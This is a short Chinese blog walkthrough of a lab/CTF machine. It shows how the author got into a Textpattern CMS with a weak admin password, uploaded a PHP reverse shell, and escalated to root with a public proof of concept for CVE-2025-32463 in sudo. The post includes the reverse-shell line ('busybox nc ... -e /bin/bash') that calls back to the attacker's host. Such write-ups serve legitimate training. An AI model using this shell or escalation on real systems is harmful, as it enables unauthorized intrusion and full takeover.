Eechoの小站

菜单

群友靶机5ud0

Eecho
Eecho
发布于 2025-07-15 / 15 阅读
0
0

群友靶机5ud0

#群友靶机#靶机#渗透

dirsearch扫描

image

http://192.168.31.193/README.txt

知道是Textpattern CMS

http://192.168.31.193/textpattern/

登录界面弱口令admin,superman

image

image

image

上传反弹shell文件。

<?php 
    exec("busybox nc 192.168.31.190 7777 -e /bin/bash");
?>

image

linpeas扫描一遍,发现有两个sudo,题目名字也是sudo。

image

image

查看系统使用的是哪一个,发现是/usr/local/bin/sudo(这个linpeas说有但没打通)

然后又看了/usr/bin/sudo的版本

image

这个版本存在CVE-2025-32463

https://github.com/K1tt3h/CVE-2025-32463-POC

下载下来了之后还需要修改一下

image

将sudo -R xd /bin/true改成/usr/bin/sudo -R xd /bin/true(因为默认使用的是usr/local/bin/sudo)

./CVE-2025-32463-POC.sh

image

获得了root权限

image

群友靶机Sneak

评论